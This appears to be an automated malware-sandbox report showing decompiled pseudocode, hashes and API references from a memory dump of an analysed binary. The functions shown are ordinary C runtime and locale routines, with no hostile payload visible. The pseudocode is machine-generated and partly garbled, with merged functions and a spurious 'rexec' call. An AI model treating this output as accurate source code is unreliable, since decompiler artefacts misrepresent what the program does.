ios_base::eofbit set, xrefs: 000B1829

Memory Dump Source

Source File: 00000000.00000002.211771003.00000000000B1000.00000020.00020000.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.211753671.00000000000B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211853475.00000000000C8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211880599.00000000000CF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211900984.00000000000D0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.211934436.00000000000D3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.212111196.000000000010C000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Exception@8Throw
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-1866435925
Opcode ID: a48092e3a890bd79eb64ebe5f511675cf60c48267a430894233cae7a160d39ac
Instruction ID: 3ab809a8d30a61627e697d57e4b65944c096c8cc995dce481c505c49b570f0dd
Opcode Fuzzy Hash: a48092e3a890bd79eb64ebe5f511675cf60c48267a430894233cae7a160d39ac
Instruction Fuzzy Hash: E701E1315887056AC710EB50CC76FEE33E87B10752F80885DF6559A083EF70D5058752

Uniqueness

Uniqueness Score: -1.00%

Function 000B20E0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E000B20E0(intOrPtr* _a4) {
				void* _v8;
				char _v12;
				char _v16;
				char _v28;
				void* _t36;
				signed int _t41;
				signed int _t42;
				char _t44;
				intOrPtr _t49;
				void* _t56;
				signed int _t59;
				intOrPtr* _t63;
				void* _t78;

				E000B3812( &_v16, 0);
				_t59 =  *0x108834; // 0x1
				_t44 =  *0x10a744;
				_v8 = _t44;
				if(_t59 == 0) {
					E000B3812( &_v12, _t59);
					_t78 =  *0x108834 - _t59; // 0x1
					if(_t78 == 0) {
						_t41 =  *0x108824; // 0x1
						_t42 = _t41 + 1;
						 *0x108824 = _t42;
						 *0x108834 = _t42;
					}
					E000B386E( &_v12);
					_t59 =  *0x108834; // 0x1
				}
				_t49 =  *_a4;
				if(_t59 >=  *((intOrPtr*)(_t49 + 0xc))) {
					_t63 = 0;
					goto L8;
				} else {
					_t63 =  *((intOrPtr*)( *((intOrPtr*)(_t49 + 8)) + _t59 * 4));
					if(_t63 != 0) {
						L16:
						E000B386E( &_v16);
						return _t63;
					} else {
						L8:
						if( *((char*)(_t49 + 0x14)) == 0) {
							L11:
							if(_t63 != 0) {
								goto L16;
							} else {
								goto L12;
							}
						} else {
							_t36 = E000B2482();
							if(_t59 >=  *((intOrPtr*)(_t36 + 0xc))) {
								L12:
								if(_t44 == 0) {
									if(E000B12B0(_t56,  &_v8, _a4) == 0xffffffff) {
										E000B3C9F( &_v28, "bad cast");
										E000B55FA( &_v28, 0xcd6f4);
										asm("int3");
										return __imp__rexec();
									}
									_t63 = _v8;
									 *0x10a744 = _t63;
									 *((intOrPtr*)( *_t63 + 4))();
									E000B245A(_t63);
									goto L16;
								} else {
									E000B386E( &_v16);
									return _t44;
								}
							} else {
								_t63 =  *((intOrPtr*)( *((intOrPtr*)(_t36 + 8)) + _t59 * 4));
								goto L11;
							}
						}
					}
				}
			}

0x000b20ee
0x000b20f3
0x000b20f9
0x000b20ff
0x000b2104
0x000b210a
0x000b210f
0x000b2115
0x000b2117
0x000b211c
0x000b211d
0x000b2122
0x000b2122
0x000b212a
0x000b212f
0x000b212f
0x000b2138
0x000b213d
0x000b214b
0x00000000
0x000b213f
0x000b2142
0x000b2147
0x000b21ab
0x000b21ae
0x000b21bb
0x000b2149
0x000b214d
0x000b2151
0x000b2163
0x000b2165
0x00000000
0x00000000
0x00000000
0x00000000
0x000b2153
0x000b2153
0x000b215b
0x000b2167
0x000b2169
0x000b2190
0x000b21c4
0x000b21d2
0x000b21d7
0x000b21d8
0x000b21d8
0x000b2192
0x000b2195
0x000b219f
0x000b21a3
0x00000000
0x000b216b
0x000b2170
0x000b217d
0x000b217d
0x000b215d
0x000b2160
0x00000000
0x000b2160
0x000b215b
0x000b2151
0x000b2147

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000B20EE

Part of subcall function 000B3812: __lock.LIBCMT ref: 000B3823

std::_Lockit::_Lockit.LIBCPMT ref: 000B210A
std::_Facet_Register.LIBCPMT ref: 000B21A3
std::bad_exception::bad_exception.LIBCMT ref: 000B21C4

Part of subcall function 000B3C9F: std::exception::exception.LIBCMT ref: 000B3CA9

__CxxThrowException@8.LIBCMT ref: 000B21D2

Part of subcall function 000B55FA: RaiseException.KERNEL32(?,?,000CD720,00000000,?,?,000B10C8,00000000,000CD720,00000000), ref: 000B564B

Strings

bad cast, xrefs: 000B21BC

Memory Dump Source

Source File: 00000000.00000002.211771003.00000000000B1000.00000020.00020000.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.211753671.00000000000B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211853475.00000000000C8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211880599.00000000000CF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211900984.00000000000D0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.211934436.00000000000D3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.212111196.000000000010C000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$LockitLockit::_$ExceptionException@8Facet_RaiseRegisterThrow__lockstd::bad_exception::bad_exceptionstd::exception::exception
String ID: bad cast
API String ID: 3247575091-3145022300
Opcode ID: 6cd9dde07d245f301a7fb3823a46e5a8a85a4431e3d1fee6ba131282fc4f2b29
Instruction ID: 17ddba8f8f23a73ce806342700c1293196d7d33c0ccfd2d550c4442e12847c68
Opcode Fuzzy Hash: 6cd9dde07d245f301a7fb3823a46e5a8a85a4431e3d1fee6ba131282fc4f2b29
Instruction Fuzzy Hash: EA3127319002049BCB11DF9CD8819DDB3F4EF34710F5481AAE945A7262DF30AE42CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 000B10D0, Relevance: 10.6, APIs: 7, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000B10D0(signed int* __ecx, void* __esi) {
				signed int _t20;
				signed int* _t32;
				signed int* _t36;
				void* _t38;
				void* _t39;

				_t36 = __ecx;
				E000B25A8(__ecx);
				_t14 = _t36[0xb];
				_t39 = _t38 + 4;
				if(_t36[0xb] != 0) {
					E000B4434(_t14);
					_t39 = _t39 + 4;
				}
				_t36[0xb] = 0;
				_t15 = _t36[9];
				if(_t36[9] != 0) {
					E000B4434(_t15);
					_t39 = _t39 + 4;
				}
				_t36[9] = 0;
				_t16 = _t36[7];
				if(_t36[7] != 0) {
					E000B4434(_t16);
					_t39 = _t39 + 4;
				}
				_t36[7] = 0;
				_t17 = _t36[5];
				if(_t36[5] != 0) {
					E000B4434(_t17);
					_t39 = _t39 + 4;
				}
				_t36[5] = 0;
				_t18 = _t36[3];
				if(_t36[3] != 0) {
					E000B4434(_t18);
					_t39 = _t39 + 4;
				}
				_t36[3] = 0;
				_t19 = _t36[1];
				if(_t36[1] != 0) {
					E000B4434(_t19);
				}
				_t36[1] = 0;
				_t32 = _t36;
				_t20 =  *_t32;
				if(_t20 != 0) {
					if(_t20 < 4) {
						return E000B3C76(0x1089e8 + _t20 * 0x18, 0x1089e8 + _t20 * 0x18);
					}
					return _t20;
				} else {
					return E000B6C24(0xc);
				}
			}

0x000b10d1
0x000b10d4
0x000b10d9
0x000b10dc
0x000b10e1
0x000b10e4
0x000b10e9
0x000b10e9
0x000b10ec
0x000b10f3
0x000b10f8
0x000b10fb
0x000b1100
0x000b1100
0x000b1103
0x000b110a
0x000b110f
0x000b1112
0x000b1117
0x000b1117
0x000b111a
0x000b1121
0x000b1126
0x000b1129
0x000b112e
0x000b112e
0x000b1131
0x000b1138
0x000b113d
0x000b1140
0x000b1145
0x000b1145
0x000b1148
0x000b114f
0x000b1154
0x000b1157
0x000b115c
0x000b115f
0x000b1166
0x000b386e
0x000b3872
0x000b3880
0x00000000
0x000b3890
0x000b3891
0x000b3874
0x000b387c
0x000b387c

APIs

std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 000B10D4

Part of subcall function 000B25A8: _setlocale.LIBCMT ref: 000B25B9

_free.LIBCMT ref: 000B10E4

Part of subcall function 000B4434: HeapFree.KERNEL32(00000000,00000000,?,000B3DD0,?,?,000B100B), ref: 000B4448
Part of subcall function 000B4434: GetLastError.KERNEL32(?,?,000B3DD0,?,?,000B100B), ref: 000B445A

_free.LIBCMT ref: 000B10FB
_free.LIBCMT ref: 000B1112
_free.LIBCMT ref: 000B1129
_free.LIBCMT ref: 000B1140
_free.LIBCMT ref: 000B1157

Memory Dump Source

Source File: 00000000.00000002.211771003.00000000000B1000.00000020.00020000.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.211753671.00000000000B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211853475.00000000000C8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211880599.00000000000CF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211900984.00000000000D0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.211934436.00000000000D3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.212111196.000000000010C000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
String ID:
API String ID: 3515823920-0
Opcode ID: c9083dd32e3c6199c501972b53ac0ab6de3e5ee15b9ba2230e718afd1a33706c
Instruction ID: b3845328830ae02e89552a42063e3199b10593eda4e07c15ee73ce45e495c982
Opcode Fuzzy Hash: c9083dd32e3c6199c501972b53ac0ab6de3e5ee15b9ba2230e718afd1a33706c
Instruction Fuzzy Hash: 67012DF0A017104BEA70EF259816BDBB2D85F10B00F444D38E54A87643E775F6188B96

Uniqueness

Uniqueness Score: -1.00%

Function 000BAB83, Relevance: 10.5, APIs: 7, Instructions: 45
threadCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E000BAB83(void* __ebx, void* __edi) {
				void* __esi;
				void* _t3;
				intOrPtr _t6;
				long _t14;
				long* _t27;

				E000BAD3D(_t3);
				if(E000B6BEF() != 0) {
					_t6 = E000BF3D1(_t5, E000BA919);
					 *0xcfb24 = _t6;
					__eflags = _t6 - 0xffffffff;
					if(_t6 == 0xffffffff) {
						goto L1;
					} else {
						_t27 = E000B7C82(1, 0x3b8);
						__eflags = _t27;
						if(_t27 == 0) {
							L6:
							E000BABF9();
							__eflags = 0;
							return 0;
						} else {
							__eflags = E000BF3FB(_t9,  *0xcfb24, _t27);
							if(__eflags == 0) {
								goto L6;
							} else {
								_push(0);
								_push(_t27);
								E000BAAD7(__ebx, __edi, _t27, __eflags);
								_t14 = GetCurrentThreadId();
								_t27[1] = _t27[1] | 0xffffffff;
								 *_t27 = _t14;
								__eflags = 1;
								return 1;
							}
						}
					}
				} else {
					L1:
					E000BABF9();
					return 0;
				}
			}

0x000bab83
0x000bab8f
0x000bab9e
0x000baba4
0x000baba9
0x000babac
0x00000000
0x000babae
0x000babbb
0x000babbf
0x000babc1
0x000babf0
0x000babf0
0x000babf5
0x000babf8
0x000babc3
0x000babd1
0x000babd3
0x00000000
0x000babd5
0x000babd5
0x000babd7
0x000babd8
0x000babdf
0x000babe5
0x000babe9
0x000babed
0x000babef
0x000babef
0x000babd3
0x000babc1
0x000bab91
0x000bab91
0x000bab91
0x000bab98
0x000bab98

APIs

__init_pointers.LIBCMT ref: 000BAB83

Part of subcall function 000BAD3D: RtlEncodePointer.NTDLL(00000000,?,000BAB88,000B4732,000CD128,00000014,00000018,000CD03C,?,00000001), ref: 000BAD40
Part of subcall function 000BAD3D: __initp_misc_winsig.LIBCMT ref: 000BAD61

__mtinitlocks.LIBCMT ref: 000BAB88

Part of subcall function 000B6BEF: InitializeCriticalSectionAndSpinCount.KERNEL32(000CF870,00000FA0,?,?,000BAB8D,000B4732,000CD128,00000014,00000018,000CD03C,?,00000001), ref: 000B6C0D

__mtterm.LIBCMT ref: 000BAB91
__calloc_crt.LIBCMT ref: 000BABB6
__initptd.LIBCMT ref: 000BABD8
GetCurrentThreadId.KERNEL32 ref: 000BABDF

Memory Dump Source

Source File: 00000000.00000002.211771003.00000000000B1000.00000020.00020000.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.211753671.00000000000B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211853475.00000000000C8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211880599.00000000000CF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211900984.00000000000D0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.211934436.00000000000D3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.212111196.000000000010C000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CountCriticalCurrentEncodeInitializePointerSectionSpinThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm
String ID:
API String ID: 2211675822-0
Opcode ID: 5b98fd7aaa6896b4ce44374a59f9d55e27f0968881180ec50e9ee958a5e5d518
Instruction ID: d566b9c87e64faeb9fbfc4295e0d933c9f1c483de8c2d10f16e558d78d95336d
Opcode Fuzzy Hash: 5b98fd7aaa6896b4ce44374a59f9d55e27f0968881180ec50e9ee958a5e5d518
Instruction Fuzzy Hash: 50F090723493122EF6647B387C17EEA2AC68F03730B244A29F5B4D54E3EF1698814157

Uniqueness

Uniqueness Score: -1.00%

Function 000B9C05, Relevance: 9.1, APIs: 6, Instructions: 134
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E000B9C05(void* __eflags, signed char _a4, signed int* _a8) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t43;
				signed int _t44;
				signed int _t45;
				signed int _t48;
				signed int _t52;
				void* _t60;
				signed int _t62;
				void* _t64;
				signed int _t67;
				signed int _t70;
				signed int _t74;
				signed int _t76;
				void* _t77;
				signed int _t85;
				void* _t86;
				signed int _t87;
				signed int _t89;
				signed int* _t92;

				_t44 = E000BB77F(_t43);
				if(_t44 >= 0) {
					_t92 = _a8;
					_t45 = E000BDFF0(_t92);
					_t74 = _t92[3];
					_t89 = _t45;
					__eflags = _t74 & 0x00000082;
					if(__eflags != 0) {
						__eflags = _t74 & 0x00000040;
						if(__eflags == 0) {
							_t70 = 0;
							__eflags = _t74 & 0x00000001;
							if((_t74 & 0x00000001) == 0) {
								L10:
								_t48 = _t92[3] & 0xffffffef | 0x00000002;
								_t92[3] = _t48;
								_t92[1] = _t70;
								__eflags = _t48 & 0x0000010c;
								if((_t48 & 0x0000010c) == 0) {
									_t60 = E000B5DFE();
									__eflags = _t92 - _t60 + 0x20;
									if(_t92 == _t60 + 0x20) {
										L13:
										_t62 = E000C098F(_t89);
										__eflags = _t62;
										if(_t62 == 0) {
											goto L14;
										}
									} else {
										_t64 = E000B5DFE();
										__eflags = _t92 - _t64 + 0x40;
										if(_t92 != _t64 + 0x40) {
											L14:
											E000BF2C3(_t92);
										} else {
											goto L13;
										}
									}
								}
								__eflags = _t92[3] & 0x00000108;
								if((_t92[3] & 0x00000108) == 0) {
									__eflags = 1;
									_push(1);
									_v8 = 1;
									_push( &_a4);
									_push(_t89);
									_t45 = E000BE2BA(_t70, _t86, _t89, _t92, 1);
									_t70 = _t45;
									goto L27;
								} else {
									_t87 = _t92[2];
									 *_t92 = _t87 + 1;
									_t76 =  *_t92 - _t87;
									_v8 = _t76;
									_t92[1] = _t92[6] - 1;
									__eflags = _t76;
									if(__eflags <= 0) {
										__eflags = _t89 - 0xffffffff;
										if(_t89 == 0xffffffff) {
											L22:
											_t77 = 0xcfd60;
										} else {
											__eflags = _t89 - 0xfffffffe;
											if(_t89 == 0xfffffffe) {
												goto L22;
											} else {
												_t77 = ((_t89 & 0x0000001f) << 6) +  *((intOrPtr*)(0x10a760 + (_t89 >> 5) * 4));
											}
										}
										__eflags =  *(_t77 + 4) & 0x00000020;
										if(__eflags == 0) {
											goto L25;
										} else {
											_push(2);
											_push(_t70);
											_push(_t70);
											_push(_t89);
											_t45 = E000BF149(_t70, _t89, _t92, __eflags) & _t87;
											__eflags = _t45 - 0xffffffff;
											if(_t45 == 0xffffffff) {
												goto L28;
											} else {
												goto L25;
											}
										}
									} else {
										_push(_t76);
										_push(_t87);
										_push(_t89);
										_t70 = E000BE2BA(_t70, _t87, _t89, _t92, __eflags);
										L25:
										_t45 = _a4;
										 *(_t92[2]) = _t45;
										L27:
										__eflags = _t70 - _v8;
										if(_t70 == _v8) {
											_t52 = _a4 & 0x000000ff;
										} else {
											L28:
											_t40 =  &(_t92[3]);
											 *_t40 = _t92[3] | 0x00000020;
											__eflags =  *_t40;
											goto L29;
										}
									}
								}
							} else {
								_t92[1] = 0;
								__eflags = _t74 & 0x00000010;
								if((_t74 & 0x00000010) == 0) {
									_t92[3] = _t74 | 0x00000020;
									L29:
									_t52 = _t45 | 0xffffffff;
								} else {
									_t85 = _t74 & 0xfffffffe;
									__eflags = _t85;
									 *_t92 = _t92[2];
									_t92[3] = _t85;
									goto L10;
								}
							}
						} else {
							_t67 = E000B4C53(__eflags);
							 *_t67 = 0x22;
							goto L6;
						}
					} else {
						_t67 = E000B4C53(__eflags);
						 *_t67 = 9;
						L6:
						_t92[3] = _t92[3] | 0x00000020;
						_t52 = _t67 | 0xffffffff;
					}
					return _t52;
				} else {
					return _t44 | 0xffffffff;
				}
			}

0x000b9c09
0x000b9c10
0x000b9c18
0x000b9c1d
0x000b9c23
0x000b9c26
0x000b9c28
0x000b9c2b
0x000b9c3a
0x000b9c3d
0x000b9c57
0x000b9c59
0x000b9c5c
0x000b9c71
0x000b9c77
0x000b9c7a
0x000b9c7d
0x000b9c80
0x000b9c85
0x000b9c87
0x000b9c8f
0x000b9c91
0x000b9c9f
0x000b9ca0
0x000b9ca6
0x000b9ca8
0x00000000
0x00000000
0x000b9c93
0x000b9c93
0x000b9c9b
0x000b9c9d
0x000b9caa
0x000b9cab
0x00000000
0x00000000
0x00000000
0x000b9c9d
0x000b9c91
0x000b9cb1
0x000b9cb8
0x000b9d36
0x000b9d37
0x000b9d38
0x000b9d3e
0x000b9d3f
0x000b9d40
0x000b9d48
0x00000000
0x000b9cba
0x000b9cba
0x000b9cc2
0x000b9cc7
0x000b9cca
0x000b9ccd
0x000b9cd0
0x000b9cd2
0x000b9ceb
0x000b9cee
0x000b9d0b
0x000b9d0b
0x000b9cf0
0x000b9cf0
0x000b9cf3
0x00000000
0x000b9cf5
0x000b9d02
0x000b9d02
0x000b9cf3
0x000b9d10
0x000b9d14
0x00000000
0x000b9d16
0x000b9d16
0x000b9d18
0x000b9d19
0x000b9d1a
0x000b9d20
0x000b9d25
0x000b9d28
0x00000000
0x00000000
0x00000000
0x00000000
0x000b9d28
0x000b9cd4
0x000b9cd4
0x000b9cd5
0x000b9cd6
0x000b9cdf
0x000b9d2a
0x000b9d2d
0x000b9d30
0x000b9d4a
0x000b9d4a
0x000b9d4d
0x000b9d58
0x000b9d4f
0x000b9d4f
0x000b9d4f
0x000b9d4f
0x000b9d4f
0x00000000
0x000b9d4f
0x000b9d4d
0x000b9cd2
0x000b9c5e
0x000b9c5e
0x000b9c61
0x000b9c64
0x000b9ce6
0x000b9d53
0x000b9d53
0x000b9c66
0x000b9c69
0x000b9c69
0x000b9c6c
0x000b9c6e
0x00000000
0x000b9c6e
0x000b9c64
0x000b9c3f
0x000b9c3f
0x000b9c44
0x00000000
0x000b9c44
0x000b9c2d
0x000b9c2d
0x000b9c32
0x000b9c4a
0x000b9c4a
0x000b9c4e
0x000b9c4e
0x000b9d60
0x000b9c12
0x000b9c16
0x000b9c16

APIs

__ioinit.LIBCMT ref: 000B9C09

Part of subcall function 000BB77F: InitOnceExecuteOnce.KERNEL32(00109360,000BB7BA,00000000,00000000,000B61E5,000CD1D0,0000000C,000B265D,?), ref: 000BB78D

Memory Dump Source

Source File: 00000000.00000002.211771003.00000000000B1000.00000020.00020000.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.211753671.00000000000B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211853475.00000000000C8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211880599.00000000000CF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211900984.00000000000D0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.211934436.00000000000D3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.212111196.000000000010C000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Once$ExecuteInit__ioinit
String ID:
API String ID: 129814473-0
Opcode ID: eddd78f7a4356004d57315eb3ea36a531a06d242828b610adbb3568eb4e699a9
Instruction ID: cca960b75760a6d768ef5f46c304204c4c296b335ff1e699b4d72a805d771973
Opcode Fuzzy Hash: eddd78f7a4356004d57315eb3ea36a531a06d242828b610adbb3568eb4e699a9
Instruction Fuzzy Hash: 60410271504B058FD7749B2AC892AFA7BE59F46320B14872DE6BBC72D2E674E8408B50

Uniqueness

Uniqueness Score: -1.00%

Function 000B1040, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E000B1040(void* __ecx, void* __esi, char* _a4) {
				char _v16;
				char* _t33;
				signed int _t39;
				signed int _t40;
				signed int _t41;
				signed int _t42;
				signed int _t43;
				signed int _t44;
				signed int _t45;
				void* _t58;
				signed int* _t60;
				signed int* _t61;
				void* _t64;
				void* _t65;
				void* _t67;
				signed int* _t68;
				void* _t74;
				void* _t75;
				void* _t76;

				_t75 = _t74 - 0xc;
				_t67 = __ecx;
				E000B3812(__ecx, 0);
				 *(__ecx + 4) = 0;
				 *((char*)(__ecx + 8)) = 0;
				 *(__ecx + 0xc) = 0;
				 *((char*)(__ecx + 0x10)) = 0;
				 *((short*)(__ecx + 0x18)) = 0;
				 *(__ecx + 0x14) = 0;
				 *((intOrPtr*)(__ecx + 0x1c)) = 0;
				 *((short*)(__ecx + 0x20)) = 0;
				 *((intOrPtr*)(__ecx + 0x24)) = 0;
				 *((char*)(__ecx + 0x28)) = 0;
				 *((intOrPtr*)(__ecx + 0x2c)) = 0;
				 *((char*)(__ecx + 0x30)) = 0;
				_t33 = _a4;
				_t80 = _t33;
				if(_t33 == 0) {
					_t60 =  &_v16;
					_a4 = "bad locale name";
					E000B3CBB(_t60,  &_a4);
					_v16 = 0xc9084;
					E000B55FA( &_v16, 0xcd720);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t67);
					_t68 = _t60;
					E000B25A8(_t68);
					_t39 = _t68[0xb];
					_t76 = _t75 + 4;
					__eflags = _t39;
					if(_t39 != 0) {
						E000B4434(_t39);
						_t76 = _t76 + 4;
					}
					_t68[0xb] = 0;
					_t40 = _t68[9];
					__eflags = _t40;
					if(_t40 != 0) {
						E000B4434(_t40);
						_t76 = _t76 + 4;
					}
					_t68[9] = 0;
					_t41 = _t68[7];
					__eflags = _t41;
					if(_t41 != 0) {
						E000B4434(_t41);
						_t76 = _t76 + 4;
					}
					_t68[7] = 0;
					_t42 = _t68[5];
					__eflags = _t42;
					if(_t42 != 0) {
						E000B4434(_t42);
						_t76 = _t76 + 4;
					}
					_t68[5] = 0;
					_t43 = _t68[3];
					__eflags = _t43;
					if(_t43 != 0) {
						E000B4434(_t43);
						_t76 = _t76 + 4;
					}
					_t68[3] = 0;
					_t44 = _t68[1];
					__eflags = _t44;
					if(_t44 != 0) {
						E000B4434(_t44);
					}
					_t68[1] = 0;
					_t61 = _t68;
					_t45 =  *_t61;
					__eflags = _t45;
					if(_t45 != 0) {
						__eflags = _t45 - 4;
						if(_t45 < 4) {
							_t47 = 0x1089e8 + _t45 * 0x18;
							__eflags = 0x1089e8 + _t45 * 0x18;
							return E000B3C76(0x1089e8 + _t45 * 0x18, _t47);
						}
						return _t45;
					} else {
						return E000B6C24(0xc);
					}
				} else {
					E000B255D(_t58, _t64, _t65, __ecx, _t80, __ecx, _t33);
					return _t67;
				}
			}

0x000b1043
0x000b1049
0x000b104b
0x000b1050
0x000b1057
0x000b105d
0x000b1064
0x000b1068
0x000b106c
0x000b1073
0x000b1076
0x000b107a
0x000b107d
0x000b1080
0x000b1083
0x000b1086
0x000b1089
0x000b108b
0x000b10a4
0x000b10a7
0x000b10ae
0x000b10bc
0x000b10c3
0x000b10c8
0x000b10c9
0x000b10ca
0x000b10cb
0x000b10cc
0x000b10cd
0x000b10ce
0x000b10cf
0x000b10d0
0x000b10d1
0x000b10d4
0x000b10d9
0x000b10dc
0x000b10df
0x000b10e1
0x000b10e4
0x000b10e9
0x000b10e9
0x000b10ec
0x000b10f3
0x000b10f6
0x000b10f8
0x000b10fb
0x000b1100
0x000b1100
0x000b1103
0x000b110a
0x000b110d
0x000b110f
0x000b1112
0x000b1117
0x000b1117
0x000b111a
0x000b1121
0x000b1124
0x000b1126
0x000b1129
0x000b112e
0x000b112e
0x000b1131
0x000b1138
0x000b113b
0x000b113d
0x000b1140
0x000b1145
0x000b1145
0x000b1148
0x000b114f
0x000b1152
0x000b1154
0x000b1157
0x000b115c
0x000b115f
0x000b1166
0x000b386e
0x000b3870
0x000b3872
0x000b387d
0x000b3880
0x000b3885
0x000b3885
0x00000000
0x000b3890
0x000b3891
0x000b3874
0x000b387c
0x000b387c
0x000b108d
0x000b108f
0x000b109d
0x000b109d

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000B104B

Part of subcall function 000B3812: __lock.LIBCMT ref: 000B3823

std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 000B108F

Part of subcall function 000B255D: _setlocale.LIBCMT ref: 000B2564
Part of subcall function 000B255D: _Yarn.LIBCPMT ref: 000B257C
Part of subcall function 000B255D: _setlocale.LIBCMT ref: 000B258C
Part of subcall function 000B255D: _Yarn.LIBCPMT ref: 000B25A0

std::exception::exception.LIBCMT ref: 000B10AE
__CxxThrowException@8.LIBCMT ref: 000B10C3

Strings

bad locale name, xrefs: 000B10A7

Memory Dump Source

Source File: 00000000.00000002.211771003.00000000000B1000.00000020.00020000.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.211753671.00000000000B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211853475.00000000000C8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211880599.00000000000CF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211900984.00000000000D0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.211934436.00000000000D3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.212111196.000000000010C000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Yarn_setlocalestd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw__lockstd::exception::exception
String ID: bad locale name
API String ID: 601777697-1405518554
Opcode ID: 9dc850eb4b39a53ed98fbbb0f5d1a2029205df5fb77cee19bf23e85b436fb53e
Instruction ID: 51d56947fe2abff8daa1e979932832b750e5f0679b869da9a62967952f0defd8
Opcode Fuzzy Hash: 9dc850eb4b39a53ed98fbbb0f5d1a2029205df5fb77cee19bf23e85b436fb53e
Instruction Fuzzy Hash: 50015271900B449EC320DF69C455BCBBFE8AF14300F008A5EE989D7642E774E208CBE6

Uniqueness

Uniqueness Score: -1.00%

Function 000B31C4, Relevance: 7.6, APIs: 5, Instructions: 144
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E000B31C4(void* __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				void* _t62;
				intOrPtr _t72;
				intOrPtr _t77;
				intOrPtr _t81;
				intOrPtr _t83;
				intOrPtr _t95;
				intOrPtr _t103;
				signed int* _t109;
				void* _t112;
				signed int _t113;
				intOrPtr _t114;
				intOrPtr _t116;
				void* _t117;

				_t113 = __esi;
				_push(0x2c);
				E000B56AB(E000C6E64, __ebx, __edi, __esi);
				_t112 = __ecx;
				_t60 =  *((intOrPtr*)(__ecx + 0x1c));
				_t95 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x1c))));
				if(_t95 == 0) {
					L3:
					_t93 = 0;
					__eflags =  *((intOrPtr*)(_t112 + 0x50));
					if( *((intOrPtr*)(_t112 + 0x50)) != 0) {
						E000B2C02(_t112);
						__eflags =  *((intOrPtr*)(_t112 + 0x40));
						if(__eflags != 0) {
							 *((intOrPtr*)(_t117 - 0x14)) = 0xf;
							 *((intOrPtr*)(_t117 - 0x18)) = 0;
							 *((char*)(_t117 - 0x28)) = 0;
							_push( *((intOrPtr*)(_t112 + 0x50)));
							 *((intOrPtr*)(_t117 - 4)) = 0;
							_t62 = E000B61A9(0, _t112, _t113, __eflags);
							_t113 = _t113 | 0xffffffff;
							while(1) {
								__eflags = _t62 - _t113;
								if(_t62 == _t113) {
									break;
								}
								E000B1BE0(_t62, _t117 - 0x28, 1, _t62);
								__eflags =  *((intOrPtr*)(_t117 - 0x14)) - 0x10;
								_t93 =  *((intOrPtr*)(_t117 - 0x28));
								if( *((intOrPtr*)(_t117 - 0x14)) < 0x10) {
									 *((intOrPtr*)(_t117 - 0x34)) = _t117 - 0x28;
								} else {
									 *((intOrPtr*)(_t117 - 0x34)) = _t93;
								}
								__eflags =  *((intOrPtr*)(_t117 - 0x14)) - 0x10;
								if( *((intOrPtr*)(_t117 - 0x14)) < 0x10) {
									_t93 = _t117 - 0x28;
								}
